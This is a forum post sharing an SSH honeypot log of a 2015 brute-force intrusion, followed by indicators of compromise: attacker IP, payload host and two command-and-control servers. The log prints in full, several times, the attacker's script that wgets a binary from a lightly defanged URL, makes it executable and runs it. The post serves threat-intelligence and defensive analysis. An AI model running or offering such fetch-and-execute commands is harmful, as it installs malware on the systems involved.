attack via ssh:
Code: Select all2015-08-09 19:05:39+0900 New connection: 43.229.53.88:47431 [session: 782]
2015-08-09 19:05:45+0900 [session=782,ip=43.229.53.88] Remote SSH version: SSH-2.0-PUTTY
2015-08-09 19:05:45+0900 [session=782,ip=43.229.53.88] kex alg, key alg: diffie-hellman-group1-sha1 ssh-rsa
2015-08-09 19:05:45+0900 [session=782,ip=43.229.53.88] outgoing: aes128-ctr hmac-sha1 none
2015-08-09 19:05:45+0900 [session=782,ip=43.229.53.88] incoming: aes128-ctr hmac-sha1 none
2015-08-09 19:05:45+0900 New connection: 43.229.53.88:47432 [session: 783]
2015-08-09 19:05:45+0900 [session=782,ip=43.229.53.88] Got remote error, code 11
2015-08-09 19:05:45+0900 [session=782,ip=43.229.53.88] connection lost
2015-08-09 19:05:46+0900 [session=783,ip=43.229.53.88] Remote SSH version: SSH-2.0-PUTTY
2015-08-09 19:05:46+0900 [session=783,ip=43.229.53.88] kex alg, key alg: diffie-hellman-group1-sha1 ssh-rsa
2015-08-09 19:05:46+0900 [session=783,ip=43.229.53.88] outgoing: aes128-ctr hmac-sha1 none
2015-08-09 19:05:46+0900 [session=783,ip=43.229.53.88] incoming: aes128-ctr hmac-sha1 none
2015-08-09 19:05:47+0900 [session=783,ip=43.229.53.88] NEW KEYS
2015-08-09 19:05:47+0900 [session=783,ip=43.229.53.88] starting service ssh-userauth
2015-08-09 19:05:48+0900 [session=783,ip=43.229.53.88] root trying auth none
2015-08-09 19:05:48+0900 [session=783,ip=43.229.53.88] root trying auth password
2015-08-09 19:05:48+0900 [session=783,ip=43.229.53.88] login attempt [root/123456] succeeded
2015-08-09 19:05:48+0900 [session=783,ip=43.229.53.88] root authenticated with password
2015-08-09 19:05:48+0900 [session=783,ip=43.229.53.88] starting service ssh-connection
2015-08-09 19:05:48+0900 [session=783,ip=43.229.53.88] got channel session request
2015-08-09 19:05:48+0900 [session=783,ip=43.229.53.88] channel open
2015-08-09 19:05:49+0900 [session=783,ip=43.229.53.88] executing command "#!/bin/sh
2015-08-09 19:05:49+0900 [session=783,ip=43.229.53.88] exec command: "#!/bin/sh
2015-08-09 19:05:49+0900 [session=783,ip=43.229.53.88] PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
2015-08-09 19:05:49+0900 [session=783,ip=43.229.53.88] wget h00p://192.126.112.88/abf/h12
2015-08-09 19:05:49+0900 [session=783,ip=43.229.53.88] chmod +x h12
2015-08-09 19:05:49+0900 [session=783,ip=43.229.53.88] ./h12
2015-08-09 19:05:49+0900 [session=783,ip=43.229.53.88] "
2015-08-09 19:05:49+0900 [session=783,ip=43.229.53.88] Opening TTY log: log/tty/20150809-190549-1667.log
2015-08-09 19:05:52+0900 [session=783,ip=43.229.53.88] Running exec command "#!/bin/sh
2015-08-09 19:05:52+0900 [session=783,ip=43.229.53.88] PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
2015-08-09 19:05:52+0900 [session=783,ip=43.229.53.88] wget h00p://192.126.112.88/abf/h12
2015-08-09 19:05:52+0900 [session=783,ip=43.229.53.88] chmod +x h12
2015-08-09 19:05:52+0900 [session=783,ip=43.229.53.88] ./h12
2015-08-09 19:05:52+0900 [session=783,ip=43.229.53.88] "
2015-08-09 19:05:52+0900 [session=783,ip=43.229.53.88] CMD: #!/bin/sh
2015-08-09 19:05:52+0900 [session=783,ip=43.229.53.88] PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
2015-08-09 19:05:52+0900 [session=783,ip=43.229.53.88] wget h00p://192.126.112.88/abf/h12
2015-08-09 19:05:52+0900 [session=783,ip=43.229.53.88] chmod +x h12
2015-08-09 19:05:52+0900 [session=783,ip=43.229.53.88] ./h12
2015-08-09 19:05:52+0900 [session=783,ip=43.229.53.88]
2015-08-09 19:05:52+0900 [session=783,ip=43.229.53.88] Command not found: #!/bin/sh
2015-08-09 19:05:52+0900 [session=783,ip=43.229.53.88] PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
2015-08-09 19:05:52+0900 [session=783,ip=43.229.53.88] wget h00p://192.126.112.88/abf/h12
2015-08-09 19:05:52+0900 [session=783,ip=43.229.53.88] chmod +x h12
2015-08-09 19:05:52+0900 [session=783,ip=43.229.53.88] ./h12
2015-08-09 19:10:54+0900 [session=783,ip=43.229.53.88] remote close
2015-08-09 19:10:54+0900 [session=783,ip=43.229.53.88] sending close 0
2015-08-09 19:10:54+0900 [session=783,ip=43.229.53.88] got channel session request
2015-08-09 19:10:54+0900 [session=783,ip=43.229.53.88] channel open
2015-08-09 19:10:55+0900 [session=783,ip=43.229.53.88] executing command "ls -la /var/run/gcc.pid"
2015-08-09 19:10:55+0900 [session=783,ip=43.229.53.88] exec command: "ls -la /var/run/gcc.pid"
2015-08-09 19:10:58+0900 [session=783,ip=43.229.53.88] Running exec command "ls -la /var/run/gcc.pid"
2015-08-09 19:10:58+0900 [session=783,ip=43.229.53.88] CMD: ls -la /var/run/gcc.pid
2015-08-09 19:10:58+0900 [session=783,ip=43.229.53.88] Command found: ls -la /var/run/gcc.pid
2015-08-09 19:10:58+0900 [session=783,ip=43.229.53.88] sending close 1
2015-08-09 19:10:58+0900 [session=783,ip=43.229.53.88] remote close
2015-08-09 19:10:58+0900 [session=783,ip=43.229.53.88] Got remote error, code 11
2015-08-09 19:10:58+0900 [session=783,ip=43.229.53.88] connection lost
Sample:
https://www.virustotal.com/en/file/9688 ... /analysis/
attacker=43.229.53.88
Code: Select all {
"ip": "43.229.53.88",
"hostname": "No Hostname",
"city": "Tsuen Wan",
"country": "HK",
"loc": "22.3667,114.1000",
"org": "AS63857 HOT NET LIMITED"
}
payload in 192.126.112.88 (h00p://192.126.112.88/abf/h12)
Code: Select all {
"ip": "192.126.112.88",
"hostname": "No Hostname",
"city": "Rowland Heights",
"region": "California",
"country": "US",
"loc": "33.9782,-117.9040",
"org": "AS26484 HOSTSPACE NETWORKS LLC",
"postal": "91748"
}
CNC1 in ns1.hostasa.org 148.163.29.12:3308
Code: Select all {
"ip": "148.163.29.12",
"hostname": "we.love.servers.at.ioflood.com",
"city": "Phoenix",
"region": "Arizona",
"country": "US",
"loc": "33.4319,-112.0150",
"org": "AS53755 Input Output Flood LLC",
"postal": "85034",
"phone": "602"
}
CNC2 in ns3.hostasa.org 192.126.126.64:3308
Code: Select all {
"ip": "192.126.126.64",
"hostname": "No Hostname",
"city": "Los Angeles",
"region": "California",
"country": "US",
"loc": "34.0530,-118.2642",
"org": "AS26484 HOSTSPACE NETWORKS LLC",
"postal": "90017"
}